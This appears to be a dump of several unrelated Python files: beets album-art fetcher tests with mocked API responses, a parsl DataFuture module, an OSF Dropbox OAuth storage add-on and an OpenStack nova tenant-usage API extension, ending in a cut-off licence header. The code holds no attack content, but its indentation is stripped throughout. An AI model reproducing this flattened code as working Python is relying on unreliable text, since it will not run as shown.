def test_itunesstore_returns_no_result_when_error_received(self):
json = '{"error": {"errors": [{"reason": "some reason"}]}}'
self.mock_response(fetchart.ITunesStore.API_URL, json)
expected = u"not found in json. Fields are"
with capture_log('beets.test_art') as logs:
with self.assertRaises(StopIteration):
next(self.source.get(self.album, self.settings, []))
self.assertIn(expected, logs[1])
def test_itunesstore_returns_no_result_with_malformed_response(self):
json = """bla blup"""
self.mock_response(fetchart.ITunesStore.API_URL, json)
expected = u"Could not decode json response:"
with capture_log('beets.test_art') as logs:
with self.assertRaises(StopIteration):
next(self.source.get(self.album, self.settings, []))
self.assertIn(expected, logs[1])
class GoogleImageTest(UseThePlugin):
def setUp(self):
super(GoogleImageTest, self).setUp()
self.source = fetchart.GoogleImages(logger, self.plugin.config)
self.settings = Settings()
@responses.activate
def run(self, *args, **kwargs):
super(GoogleImageTest, self).run(*args, **kwargs)
def mock_response(self, url, json):
responses.add(responses.GET, url, body=json,
content_type='application/json')
def test_google_art_finds_image(self):
album = _common.Bag(albumartist="some artist", album="some album")
json = '{"items": [{"link": "url_to_the_image"}]}'
self.mock_response(fetchart.GoogleImages.URL, json)
candidate = next(self.source.get(album, self.settings, []))
self.assertEqual(candidate.url, 'url_to_the_image')
def test_google_art_returns_no_result_when_error_received(self):
album = _common.Bag(albumartist="some artist", album="some album")
json = '{"error": {"errors": [{"reason": "some reason"}]}}'
self.mock_response(fetchart.GoogleImages.URL, json)
with self.assertRaises(StopIteration):
next(self.source.get(album, self.settings, []))
def test_google_art_returns_no_result_with_malformed_response(self):
album = _common.Bag(albumartist="some artist", album="some album")
json = """bla blup"""
self.mock_response(fetchart.GoogleImages.URL, json)
with self.assertRaises(StopIteration):
next(self.source.get(album, self.settings, []))
class CoverArtArchiveTest(UseThePlugin, CAAHelper):
def setUp(self):
super(CoverArtArchiveTest, self).setUp()
self.source = fetchart.CoverArtArchive(logger, self.plugin.config)
self.settings = Settings(maxwidth=0)
@responses.activate
def run(self, *args, **kwargs):
super(CoverArtArchiveTest, self).run(*args, **kwargs)
def test_caa_finds_image(self):
album = _common.Bag(mb_albumid=self.MBID_RELASE,
mb_releasegroupid=self.MBID_GROUP)
self.mock_caa_response(self.RELEASE_URL, self.RESPONSE_RELEASE)
self.mock_caa_response(self.GROUP_URL, self.RESPONSE_GROUP)
candidates = list(self.source.get(album, self.settings, []))
self.assertEqual(len(candidates), 3)
self.assertEqual(len(responses.calls), 2)
self.assertEqual(responses.calls[0].request.url, self.RELEASE_URL)
class FanartTVTest(UseThePlugin):
RESPONSE_MULTIPLE = u"""{
"name": "artistname",
"mbid_id": "artistid",
"albums": {
"thereleasegroupid": {
"albumcover": [
{
"id": "24",
"url": "http://example.com/1.jpg",
"likes": "0"
},
{
"id": "42",
"url": "http://example.com/2.jpg",
"likes": "0"
},
{
"id": "23",
"url": "http://example.com/3.jpg",
"likes": "0"
}
],
"cdart": [
{
"id": "123",
"url": "http://example.com/4.jpg",
"likes": "0",
"disc": "1",
"size": "1000"
}
]
}
}
}"""
RESPONSE_NO_ART = u"""{
"name": "artistname",
"mbid_id": "artistid",
"albums": {
"thereleasegroupid": {
"cdart": [
{
"id": "123",
"url": "http://example.com/4.jpg",
"likes": "0",
"disc": "1",
"size": "1000"
}
]
}
}
}"""
RESPONSE_ERROR = u"""{
"status": "error",
"error message": "the error message"
}"""
RESPONSE_MALFORMED = u"bla blup"
def setUp(self):
super(FanartTVTest, self).setUp()
self.source = fetchart.FanartTV(logger, self.plugin.config)
self.settings = Settings()
@responses.activate
def run(self, *args, **kwargs):
super(FanartTVTest, self).run(*args, **kwargs)
def mock_response(self, url, json):
responses.add(responses.GET, url, body=json,
content_type='application/json')
def test_fanarttv_finds_image(self):
album = _common.Bag(mb_releasegroupid=u'thereleasegroupid')
self.mock_response(fetchart.FanartTV.API_ALBUMS + u'thereleasegroupid',
self.RESPONSE_MULTIPLE)
candidate = next(self.source.get(album, self.settings, []))
self.assertEqual(candidate.url, 'http://example.com/1.jpg')
def test_fanarttv_returns_no_result_when_error_received(self):
album = _common.Bag(mb_releasegroupid=u'thereleasegroupid')
self.mock_response(fetchart.FanartTV.API_ALBUMS + u'thereleasegroupid',
self.RESPONSE_ERROR)
with self.assertRaises(StopIteration):
next(self.source.get(album, self.settings, []))
def test_fanarttv_returns_no_result_with_malformed_response(self):
album = _common.Bag(mb_releasegroupid=u'thereleasegroupid')
self.mock_response(fetchart.FanartTV.API_ALBUMS + u'thereleasegroupid',
self.RESPONSE_MALFORMED)
with self.assertRaises(StopIteration):
next(self.source.get(album, self.settings, []))
def test_fanarttv_only_other_images(self):
# The source used to fail when there were images present, but no cover
album = _common.Bag(mb_releasegroupid=u'thereleasegroupid')
self.mock_response(fetchart.FanartTV.API_ALBUMS + u'thereleasegroupid',
self.RESPONSE_NO_ART)
with self.assertRaises(StopIteration):
next(self.source.get(album, self.settings, []))
@_common.slow_test()
class ArtImporterTest(UseThePlugin):
def setUp(self):
super(ArtImporterTest, self).setUp()
# Mock the album art fetcher to always return our test file.
self.art_file = os.path.join(self.temp_dir, b'tmpcover.jpg')
_common.touch(self.art_file)
self.old_afa = self.plugin.art_for_album
self.afa_response = fetchart.Candidate(logger, path=self.art_file)
def art_for_album(i, p, local_only=False):
return self.afa_response
self.plugin.art_for_album = art_for_album
# Test library.
self.libpath = os.path.join(self.temp_dir, b'tmplib.blb')
self.libdir = os.path.join(self.temp_dir, b'tmplib')
os.mkdir(self.libdir)
os.mkdir(os.path.join(self.libdir, b'album'))
itempath = os.path.join(self.libdir, b'album', b'test.mp3')
shutil.copyfile(os.path.join(_common.RSRC, b'full.mp3'), itempath)
self.lib = library.Library(self.libpath)
self.i = _common.item()
self.i.path = itempath
self.album = self.lib.add_album([self.i])
self.lib._connection().commit()
# The import configuration.
self.session = _common.import_session(self.lib)
# Import task for the coroutine.
self.task = importer.ImportTask(None, None, [self.i])
self.task.is_album = True
self.task.album = self.album
info = AlbumInfo(
album=u'some album',
album_id=u'albumid',
artist=u'some artist',
artist_id=u'artistid',
tracks=[],
)
self.task.set_choice(AlbumMatch(0, info, {}, set(), set()))
def tearDown(self):
self.lib._connection().close()
super(ArtImporterTest, self).tearDown()
self.plugin.art_for_album = self.old_afa
def _fetch_art(self, should_exist):
"""Execute the fetch_art coroutine for the task and return the
album's resulting artpath. ``should_exist`` specifies whether to
assert that art path was set (to the correct value) or or that
the path was not set.
"""
# Execute the two relevant parts of the importer.
self.plugin.fetch_art(self.session, self.task)
self.plugin.assign_art(self.session, self.task)
artpath = self.lib.albums()[0].artpath
if should_exist:
self.assertEqual(
artpath,
os.path.join(os.path.dirname(self.i.path), b'cover.jpg')
)
self.assertExists(artpath)
else:
self.assertEqual(artpath, None)
return artpath
def test_fetch_art(self):
assert not self.lib.albums()[0].artpath
self._fetch_art(True)
def test_art_not_found(self):
self.afa_response = None
self._fetch_art(False)
def test_no_art_for_singleton(self):
self.task.is_album = False
self._fetch_art(False)
def test_leave_original_file_in_place(self):
self._fetch_art(True)
self.assertExists(self.art_file)
def test_delete_original_file(self):
self.plugin.src_removed = True
self._fetch_art(True)
self.assertNotExists(self.art_file)
def test_do_not_delete_original_if_already_in_place(self):
artdest = os.path.join(os.path.dirname(self.i.path), b'cover.jpg')
shutil.copyfile(self.art_file, artdest)
self.afa_response = fetchart.Candidate(logger, path=artdest)
self._fetch_art(True)
def test_fetch_art_if_imported_file_deleted(self):
# See #1126. Test the following scenario:
# - Album art imported, `album.artpath` set.
# - Imported album art file subsequently deleted (by user or other
# program).
# `fetchart` should import album art again instead of printing the
# message "<album> has album art".
self._fetch_art(True)
util.remove(self.album.artpath)
self.plugin.batch_fetch_art(self.lib, self.lib.albums(), force=False,
quiet=False)
self.assertExists(self.album.artpath)
class ArtForAlbumTest(UseThePlugin):
""" Tests that fetchart.art_for_album respects the size
configuration (e.g., minwidth, enforce_ratio)
"""
IMG_225x225 = os.path.join(_common.RSRC, b'abbey.jpg')
IMG_348x348 = os.path.join(_common.RSRC, b'abbey-different.jpg')
IMG_500x490 = os.path.join(_common.RSRC, b'abbey-similar.jpg')
def setUp(self):
super(ArtForAlbumTest, self).setUp()
self.old_fs_source_get = fetchart.FileSystem.get
def fs_source_get(_self, album, settings, paths):
if paths:
yield fetchart.Candidate(logger, path=self.image_file)
fetchart.FileSystem.get = fs_source_get
self.album = _common.Bag()
def tearDown(self):
fetchart.FileSystem.get = self.old_fs_source_get
super(ArtForAlbumTest, self).tearDown()
def _assertImageIsValidArt(self, image_file, should_exist): # noqa
self.assertExists(image_file)
self.image_file = image_file
candidate = self.plugin.art_for_album(self.album, [''], True)
if should_exist:
self.assertNotEqual(candidate, None)
self.assertEqual(candidate.path, self.image_file)
self.assertExists(candidate.path)
else:
self.assertIsNone(candidate)
def _assertImageResized(self, image_file, should_resize): # noqa
self.image_file = image_file
with patch.object(ArtResizer.shared, 'resize') as mock_resize:
self.plugin.art_for_album(self.album, [''], True)
self.assertEqual(mock_resize.called, should_resize)
def _require_backend(self):
"""Skip the test if the art resizer doesn't have ImageMagick or
PIL (so comparisons and measurements are unavailable).
"""
if ArtResizer.shared.method[0] == WEBPROXY:
self.skipTest(u"ArtResizer has no local imaging backend available")
def test_respect_minwidth(self):
self._require_backend()
self.plugin.minwidth = 300
self._assertImageIsValidArt(self.IMG_225x225, False)
self._assertImageIsValidArt(self.IMG_348x348, True)
def test_respect_enforce_ratio_yes(self):
self._require_backend()
self.plugin.enforce_ratio = True
self._assertImageIsValidArt(self.IMG_500x490, False)
self._assertImageIsValidArt(self.IMG_225x225, True)
def test_respect_enforce_ratio_no(self):
self.plugin.enforce_ratio = False
self._assertImageIsValidArt(self.IMG_500x490, True)
def test_respect_enforce_ratio_px_above(self):
self._require_backend()
self.plugin.enforce_ratio = True
self.plugin.margin_px = 5
self._assertImageIsValidArt(self.IMG_500x490, False)
def test_respect_enforce_ratio_px_below(self):
self._require_backend()
self.plugin.enforce_ratio = True
self.plugin.margin_px = 15
self._assertImageIsValidArt(self.IMG_500x490, True)
def test_respect_enforce_ratio_percent_above(self):
self._require_backend()
self.plugin.enforce_ratio = True
self.plugin.margin_percent = (500 - 490) / 500 * 0.5
self._assertImageIsValidArt(self.IMG_500x490, False)
def test_respect_enforce_ratio_percent_below(self):
self._require_backend()
self.plugin.enforce_ratio = True
self.plugin.margin_percent = (500 - 490) / 500 * 1.5
self._assertImageIsValidArt(self.IMG_500x490, True)
def test_resize_if_necessary(self):
self._require_backend()
self.plugin.maxwidth = 300
self._assertImageResized(self.IMG_225x225, False)
self._assertImageResized(self.IMG_348x348, True)
class DeprecatedConfigTest(_common.TestCase):
"""While refactoring the plugin, the remote_priority option was deprecated,
and a new codepath should translate its effect. Check that it actually does
so.
"""
# If we subclassed UseThePlugin, the configuration change would either be
# overwritten by _common.TestCase or be set after constructing the
# plugin object
def setUp(self):
super(DeprecatedConfigTest, self).setUp()
config['fetchart']['remote_priority'] = True
self.plugin = fetchart.FetchArtPlugin()
def test_moves_filesystem_to_end(self):
self.assertEqual(type(self.plugin.sources[-1]), fetchart.FileSystem)
class EnforceRatioConfigTest(_common.TestCase):
"""Throw some data at the regexes."""
def _load_with_config(self, values, should_raise):
if should_raise:
for v in values:
config['fetchart']['enforce_ratio'] = v
with self.assertRaises(confuse.ConfigValueError):
fetchart.FetchArtPlugin()
else:
for v in values:
config['fetchart']['enforce_ratio'] = v
fetchart.FetchArtPlugin()
def test_px(self):
self._load_with_config(u'0px 4px 12px 123px'.split(), False)
self._load_with_config(u'00px stuff5px'.split(), True)
def test_percent(self):
self._load_with_config(u'0% 0.00% 5.1% 5% 100%'.split(), False)
self._load_with_config(u'00% 1.234% foo5% 100.1%'.split(), True)
def suite():
return unittest.TestLoader().loadTestsFromName(__name__)
if __name__ == '__main__':
unittest.main(defaultTest='suite')
|
|
"""This module implements DataFutures.
We have two basic types of futures:
1. DataFutures which represent data objects
2. AppFutures which represent the futures on App/Leaf tasks.
"""
import os
import logging
from concurrent.futures import Future
from parsl.dataflow.futures import AppFuture
from parsl.app.errors import *
from parsl.data_provider.files import File
logger = logging.getLogger(__name__)
# Possible future states (for internal use by the futures package).
PENDING = 'PENDING'
RUNNING = 'RUNNING'
# The future was cancelled by the user...
CANCELLED = 'CANCELLED'
# ...and _Waiter.add_cancelled() was called by a worker.
CANCELLED_AND_NOTIFIED = 'CANCELLED_AND_NOTIFIED'
FINISHED = 'FINISHED'
_STATE_TO_DESCRIPTION_MAP = {
PENDING: "pending",
RUNNING: "running",
CANCELLED: "cancelled",
CANCELLED_AND_NOTIFIED: "cancelled",
FINISHED: "finished"
}
class DataFuture(Future):
"""A datafuture points at an AppFuture.
We are simply wrapping a AppFuture, and adding the specific case where, if
the future is resolved i.e file exists, then the DataFuture is assumed to be
resolved.
"""
def parent_callback(self, parent_fu):
"""Callback from executor future to update the parent.
Args:
- parent_fu (Future): Future returned by the executor along with callback
Returns:
- None
Updates the super() with the result() or exception()
"""
if parent_fu.done() is True:
e = parent_fu._exception
if e:
super().set_exception(e)
else:
super().set_result(parent_fu.result())
return
def __init__(self, fut, file_obj, parent=None, tid=None):
"""Construct the DataFuture object.
If the file_obj is a string convert to a File.
Args:
- fut (AppFuture) : AppFuture that this DataFuture will track
- file_obj (string/File obj) : Something representing file(s)
Kwargs:
- parent ()
- tid (task_id) : Task id that this DataFuture tracks
"""
super().__init__()
self._tid = tid
if isinstance(file_obj, str) and not isinstance(file_obj, File):
self.file_obj = File(file_obj)
else:
self.file_obj = file_obj
self.parent = parent
self._exception = None
if fut is None:
logger.debug("Setting result to filepath since no future was passed")
self.set_result = self.file_obj
else:
if isinstance(fut, Future):
self.parent = fut
self.parent.add_done_callback(self.parent_callback)
else:
raise NotFutureError("DataFuture can be created only with a FunctionFuture on None")
logger.debug("Creating DataFuture with parent: %s", parent)
logger.debug("Filepath: %s", self.filepath)
@property
def tid(self):
"""Returns the task_id of the task that will resolve this DataFuture."""
return self._tid
@property
def filepath(self):
"""Filepath of the File object this datafuture represents."""
return self.file_obj.filepath
@property
def filename(self):
"""Filepath of the File object this datafuture represents."""
return self.filepath
def result(self, timeout=None):
"""A blocking call that returns either the result or raises an exception.
Assumptions : A DataFuture always has a parent AppFuture. The AppFuture does callbacks when
setup.
Kwargs:
- timeout (int): Timeout in seconds
Returns:
- If App completed successfully returns the filepath.
Raises:
- Exception raised by app if failed.
"""
if self.parent:
if self.parent.done():
# This explicit call to raise exceptions might be redundant.
# the result() call *should* raise an exception if there's one
e = self.parent._exception
if e:
raise e
else:
self.parent.result(timeout=timeout)
else:
self.parent.result(timeout=timeout)
return self.file_obj
def cancel(self):
"""Cancel the task that this DataFuture is tracking.
Note: This may not work
"""
if self.parent:
return self.parent.cancel
else:
return False
def cancelled(self):
if self.parent:
return self.parent.cancelled()
else:
return False
def running(self):
if self.parent:
return self.parent.running()
else:
return False
def done(self):
if self.parent:
return self.parent.done()
else:
return True
def exception(self, timeout=None):
if self.parent:
return self.parent.exception(timeout=timeout)
else:
return True
def add_done_callback(self, fn):
if self.parent:
return self.parent.add_done_callback(fn)
else:
raise ValueError("Callback will be discarded because no parent future")
def __repr__(self):
# The DataFuture could be wrapping an AppFuture whose parent is a Future
# check to find the top level parent
if isinstance(self.parent, AppFuture):
parent = self.parent.parent
else:
parent = self.parent
if parent:
with parent._condition:
if parent._state == FINISHED:
if parent._exception:
return '<%s at %#x state=%s raised %s>' % (
self.__class__.__name__,
id(self),
_STATE_TO_DESCRIPTION_MAP[parent._state],
parent._exception.__class__.__name__)
else:
return '<%s at %#x state=%s returned %s>' % (
self.__class__.__name__,
id(self),
_STATE_TO_DESCRIPTION_MAP[parent._state],
self.filepath)
return '<%s at %#x state=%s>' % (
self.__class__.__name__,
id(self),
_STATE_TO_DESCRIPTION_MAP[parent._state])
else:
return '<%s at %#x state=%s>' % (
self.__class__.__name__,
id(self),
_STATE_TO_DESCRIPTION_MAP[self._state])
def testing_nonfuture():
fpath = '~/shuffled.txt'
df = DataFuture(None, fpath)
print(df)
print("Result: ", df.filepath)
assert df.filepath == os.path.abspath(os.path.expanduser(fpath))
if __name__ == "__main__":
# logging.basicConfig(filename='futures.testing.log',level=logging.DEBUG)
import sys
import random
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
logger.debug("Begin Testing")
with open('shuffled.txt', 'w') as testfile:
nums = list(range(0, 10000))
random.shuffle(nums)
for item in nums:
testfile.write("{0}\n".format(item))
foo = Future()
df = DataFuture(foo, './shuffled.txt')
dx = DataFuture(foo, '~/shuffled.txt')
print(foo.done())
print(df.done())
testing_nonfuture()
|
|
from rest_framework import status as http_status
import logging
import os
from oauthlib.common import generate_token
from addons.base.models import (BaseOAuthNodeSettings, BaseOAuthUserSettings,
BaseStorageAddon)
from django.db import models
from dropbox.dropbox import Dropbox
from dropbox.exceptions import ApiError, DropboxException
from dropbox.files import FolderMetadata
from dropbox import DropboxOAuth2Flow, oauth
from flask import request
from framework.auth import Auth
from framework.exceptions import HTTPError
from framework.sessions import session
from osf.models.external import ExternalProvider
from osf.models.files import File, Folder, BaseFileNode
from addons.base import exceptions
from addons.dropbox import settings
from addons.dropbox.serializer import DropboxSerializer
from website.util import api_v2_url, web_url_for
logger = logging.getLogger(__name__)
class DropboxFileNode(BaseFileNode):
_provider = 'dropbox'
class DropboxFolder(DropboxFileNode, Folder):
pass
class DropboxFile(DropboxFileNode, File):
@property
def _hashes(self):
try:
return {'Dropbox content_hash': self._history[-1]['extra']['hashes']['dropbox']}
except (IndexError, KeyError):
return None
class Provider(ExternalProvider):
name = 'Dropbox'
short_name = 'dropbox'
client_id = settings.DROPBOX_KEY
client_secret = settings.DROPBOX_SECRET
# Explicitly override auth_url_base as None -- DropboxOAuth2Flow handles this for us
auth_url_base = None
callback_url = None
handle_callback = None
@property
def oauth_flow(self):
if 'oauth_states' not in session.data:
session.data['oauth_states'] = {}
if self.short_name not in session.data['oauth_states']:
session.data['oauth_states'][self.short_name] = {
'state': generate_token()
}
return DropboxOAuth2Flow(
self.client_id,
self.client_secret,
redirect_uri=web_url_for(
'oauth_callback',
service_name=self.short_name,
_absolute=True
),
session=session.data['oauth_states'][self.short_name], csrf_token_session_key='state'
)
@property
def auth_url(self):
ret = self.oauth_flow.start('force_reapprove=true')
session.save()
return ret
# Overrides ExternalProvider
def auth_callback(self, user):
# TODO: consider not using client library during auth flow
try:
access_token = self.oauth_flow.finish(request.values).access_token
except (oauth.NotApprovedException, oauth.BadStateException):
# 1) user cancelled and client library raised exc., or
# 2) the state was manipulated, possibly due to time.
# Either way, return and display info about how to properly connect.
return
except (oauth.ProviderException, oauth.CsrfException):
raise HTTPError(http_status.HTTP_403_FORBIDDEN)
except oauth.BadRequestException:
raise HTTPError(http_status.HTTP_400_BAD_REQUEST)
self.client = Dropbox(access_token)
info = self.client.users_get_current_account()
return self._set_external_account(
user,
{
'key': access_token,
'provider_id': info.account_id,
'display_name': info.name.display_name,
}
)
class UserSettings(BaseOAuthUserSettings):
"""Stores user-specific dropbox information.
token.
"""
oauth_provider = Provider
serializer = DropboxSerializer
def revoke_remote_oauth_access(self, external_account):
"""Overrides default behavior during external_account deactivation.
Tells Dropbox to remove the grant for the OSF associated with this account.
"""
client = Dropbox(external_account.oauth_key)
try:
client.auth_token_revoke()
except DropboxException:
pass
class NodeSettings(BaseOAuthNodeSettings, BaseStorageAddon):
oauth_provider = Provider
serializer = DropboxSerializer
folder = models.TextField(null=True, blank=True)
user_settings = models.ForeignKey(UserSettings, null=True, blank=True, on_delete=models.CASCADE)
_api = None
@property
def api(self):
"""authenticated ExternalProvider instance"""
if self._api is None:
self._api = Provider(self.external_account)
return self._api
@property
def folder_id(self):
return self.folder
@property
def folder_name(self):
return os.path.split(self.folder or '')[1] or '/ (Full Dropbox)' if self.folder else None
@property
def folder_path(self):
return self.folder
@property
def display_name(self):
return '{0}: {1}'.format(self.config.full_name, self.folder)
def clear_settings(self):
self.folder = None
def get_folders(self, **kwargs):
folder_id = kwargs.get('folder_id')
if folder_id is None:
return [{
'addon': 'dropbox',
'id': '/',
'path': '/',
'kind': 'folder',
'name': '/ (Full Dropbox)',
'urls': {
'folders': api_v2_url('nodes/{}/addons/dropbox/folders/'.format(self.owner._id),
params={'id': '/'}
)
}
}]
client = Dropbox(self.external_account.oauth_key)
try:
folder_id = '' if folder_id == '/' else folder_id
list_folder = client.files_list_folder(folder_id)
contents = [x for x in list_folder.entries]
while list_folder.has_more:
list_folder = client.files_list_folder_continue(list_folder.cursor)
contents += [x for x in list_folder.entries]
except ApiError as error:
raise HTTPError(http_status.HTTP_400_BAD_REQUEST, data={
'message_short': error.user_message_text,
'message_long': error.user_message_text,
})
except DropboxException:
raise HTTPError(http_status.HTTP_400_BAD_REQUEST)
return [
{
'addon': 'dropbox',
'kind': 'folder',
'id': item.path_display,
'name': item.path_display.split('/')[-1],
'path': item.path_display,
'urls': {
'folders': api_v2_url('nodes/{}/addons/dropbox/folders/'.format(self.owner._id),
params={'id': item.path_display}
)
}
}
for item in contents
if isinstance(item, FolderMetadata)
]
def set_folder(self, folder, auth):
self.folder = folder
# Add log to node
self.nodelogger.log(action='folder_selected', save=True)
def deauthorize(self, auth=None, add_log=True):
"""Remove user authorization from this node and log the event."""
folder = self.folder
self.clear_settings()
if add_log:
extra = {'folder': folder}
self.nodelogger.log(action='node_deauthorized', extra=extra, save=True)
self.clear_auth()
def serialize_waterbutler_credentials(self):
if not self.has_auth:
raise exceptions.AddonError('Addon is not authorized')
return {'token': self.external_account.oauth_key}
def serialize_waterbutler_settings(self):
if not self.folder:
raise exceptions.AddonError('Folder is not configured')
return {'folder': self.folder}
def create_waterbutler_log(self, auth, action, metadata):
url = self.owner.web_url_for('addon_view_or_download_file',
path=metadata['path'].strip('/'),
provider='dropbox'
)
self.owner.add_log(
'dropbox_{0}'.format(action),
auth=auth,
params={
'project': self.owner.parent_id,
'node': self.owner._id,
'path': metadata['path'],
'folder': self.folder,
'urls': {
'view': url,
'download': url + '?action=download'
},
},
)
def __repr__(self):
return u'<NodeSettings(node_id={self.owner._primary_key!r})>'.format(self=self)
##### Callback overrides #####
def after_delete(self, user):
self.deauthorize(Auth(user=user), add_log=True)
self.save()
def on_delete(self):
self.deauthorize(add_log=False)
self.save()
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import urlparse
from webob import exc
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.api.openstack import xmlutil
from nova.compute import api
from nova.compute import flavors
from nova import exception
from nova.openstack.common import timeutils
ALIAS = 'os-simple-tenant-usage'
authorize_show = extensions.extension_authorizer('compute',
'v3:' + ALIAS + ':show')
authorize_list = extensions.extension_authorizer('compute',
'v3:' + ALIAS + ':list')
def make_usage(elem):
for subelem_tag in ('tenant_id', 'total_local_gb_usage',
'total_vcpus_usage', 'total_memory_mb_usage',
'total_hours', 'start', 'stop'):
subelem = xmlutil.SubTemplateElement(elem, subelem_tag)
subelem.text = subelem_tag
server_usages = xmlutil.SubTemplateElement(elem, 'server_usages')
server_usage = xmlutil.SubTemplateElement(server_usages, 'server_usage',
selector='server_usages')
for subelem_tag in ('instance_id', 'name', 'hours', 'memory_mb',
'local_gb', 'vcpus', 'tenant_id', 'flavor',
'started_at', 'ended_at', 'state', 'uptime'):
subelem = xmlutil.SubTemplateElement(server_usage, subelem_tag)
subelem.text = subelem_tag
class SimpleTenantUsageTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('tenant_usage', selector='tenant_usage')
make_usage(root)
return xmlutil.MasterTemplate(root, 1)
class SimpleTenantUsagesTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('tenant_usages')
elem = xmlutil.SubTemplateElement(root, 'tenant_usage',
selector='tenant_usages')
make_usage(elem)
return xmlutil.MasterTemplate(root, 1)
class SimpleTenantUsageController(object):
def _hours_for(self, instance, period_start, period_stop):
launched_at = instance['launched_at']
terminated_at = instance['terminated_at']
if terminated_at is not None:
if not isinstance(terminated_at, datetime.datetime):
terminated_at = timeutils.parse_strtime(terminated_at,
"%Y-%m-%d %H:%M:%S.%f")
if launched_at is not None:
if not isinstance(launched_at, datetime.datetime):
launched_at = timeutils.parse_strtime(launched_at,
"%Y-%m-%d %H:%M:%S.%f")
if terminated_at and terminated_at < period_start:
return 0
# nothing if it started after the usage report ended
if launched_at and launched_at > period_stop:
return 0
if launched_at:
# if instance launched after period_started, don't charge for first
start = max(launched_at, period_start)
if terminated_at:
# if instance stopped before period_stop, don't charge after
stop = min(period_stop, terminated_at)
else:
# instance is still running, so charge them up to current time
stop = period_stop
dt = stop - start
seconds = (dt.days * 3600 * 24 + dt.seconds +
dt.microseconds / 100000.0)
return seconds / 3600.0
else:
# instance hasn't launched, so no charge
return 0
def _get_flavor(self, context, compute_api, instance, flavors_cache):
"""Get flavor information from the instance's system_metadata,
allowing a fallback to lookup by-id for deleted instances only.
"""
try:
return flavors.extract_flavor(instance)
except KeyError:
if not instance['deleted']:
# Only support the fallback mechanism for deleted instances
# that would have been skipped by migration #153
raise
flavor_type = instance['instance_type_id']
if flavor_type in flavors_cache:
return flavors_cache[flavor_type]
try:
it_ref = compute_api.get_instance_type(context, flavor_type)
flavors_cache[flavor_type] = it_ref
except exception.InstanceTypeNotFound:
# can't bill if there is no instance type
it_ref = None
return it_ref
def _tenant_usages_for_period(self, context, period_start,
period_stop, tenant_id=None, detailed=True):
compute_api = api.API()
instances = compute_api.get_active_by_window(context,
period_start,
period_stop,
tenant_id)
rval = {}
flavors = {}
for instance in instances:
info = {}
info['hours'] = self._hours_for(instance,
period_start,
period_stop)
flavor = self._get_flavor(context, compute_api, instance, flavors)
if not flavor:
continue
info['instance_id'] = instance['uuid']
info['name'] = instance['display_name']
info['memory_mb'] = flavor['memory_mb']
info['local_gb'] = flavor['root_gb'] + flavor['ephemeral_gb']
info['vcpus'] = flavor['vcpus']
info['tenant_id'] = instance['project_id']
info['flavor'] = flavor['name']
info['started_at'] = instance['launched_at']
info['ended_at'] = instance['terminated_at']
if info['ended_at']:
info['state'] = 'terminated'
else:
info['state'] = instance['vm_state']
now = timeutils.utcnow()
if info['state'] == 'terminated':
delta = info['ended_at'] - info['started_at']
else:
delta = now - info['started_at']
info['uptime'] = delta.days * 24 * 3600 + delta.seconds
if info['tenant_id'] not in rval:
summary = {}
summary['tenant_id'] = info['tenant_id']
if detailed:
summary['server_usages'] = []
summary['total_local_gb_usage'] = 0
summary['total_vcpus_usage'] = 0
summary['total_memory_mb_usage'] = 0
summary['total_hours'] = 0
summary['start'] = period_start
summary['stop'] = period_stop
rval[info['tenant_id']] = summary
summary = rval[info['tenant_id']]
summary['total_local_gb_usage'] += info['local_gb'] * info['hours']
summary['total_vcpus_usage'] += info['vcpus'] * info['hours']
summary['total_memory_mb_usage'] += (info['memory_mb'] *
info['hours'])
summary['total_hours'] += info['hours']
if detailed:
summary['server_usages'].append(info)
return rval.values()
def _parse_datetime(self, dtstr):
if not dtstr:
return timeutils.utcnow()
elif isinstance(dtstr, datetime.datetime):
return dtstr
try:
return timeutils.parse_strtime(dtstr, "%Y-%m-%dT%H:%M:%S")
except Exception:
try:
return timeutils.parse_strtime(dtstr, "%Y-%m-%dT%H:%M:%S.%f")
except Exception:
return timeutils.parse_strtime(dtstr, "%Y-%m-%d %H:%M:%S.%f")
def _get_datetime_range(self, req):
qs = req.environ.get('QUERY_STRING', '')
env = urlparse.parse_qs(qs)
# NOTE(lzyeval): env.get() always returns a list
period_start = self._parse_datetime(env.get('start', [None])[0])
period_stop = self._parse_datetime(env.get('end', [None])[0])
if not period_start < period_stop:
msg = _("Invalid start time. The start time cannot occur after "
"the end time.")
raise exc.HTTPBadRequest(explanation=msg)
detailed = env.get('detailed', ['0'])[0] == '1'
return (period_start, period_stop, detailed)
@wsgi.serializers(xml=SimpleTenantUsagesTemplate)
def index(self, req):
"""Retrieve tenant_usage for all tenants."""
context = req.environ['nova.context']
authorize_list(context)
(period_start, period_stop, detailed) = self._get_datetime_range(req)
now = timeutils.utcnow()
if period_stop > now:
period_stop = now
usages = self._tenant_usages_for_period(context,
period_start,
period_stop,
detailed=detailed)
return {'tenant_usages': usages}
@wsgi.serializers(xml=SimpleTenantUsageTemplate)
def show(self, req, id):
"""Retrieve tenant_usage for a specified tenant."""
tenant_id = id
context = req.environ['nova.context']
authorize_show(context, {'project_id': tenant_id})
(period_start, period_stop, ignore) = self._get_datetime_range(req)
now = timeutils.utcnow()
if period_stop > now:
period_stop = now
usage = self._tenant_usages_for_period(context,
period_start,
period_stop,
tenant_id=tenant_id,
detailed=True)
if len(usage):
usage = usage[0]
else:
usage = {}
return {'tenant_usage': usage}
class SimpleTenantUsage(extensions.V3APIExtensionBase):
"""Simple tenant usage extension."""
name = "SimpleTenantUsage"
alias = ALIAS
namespace = ("http://docs.openstack.org/compute/ext/"
"os-simple-tenant-usage/api/v3")
version = 1
def get_resources(self):
res = [extensions.ResourceExtension('os-simple-tenant-usage',
SimpleTenantUsageController())]
return res
def get_controller_extensions(self):
"""It's an abstract function V3APIExtensionBase and the extension
will not be loaded without it.
"""
return []
|
|
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
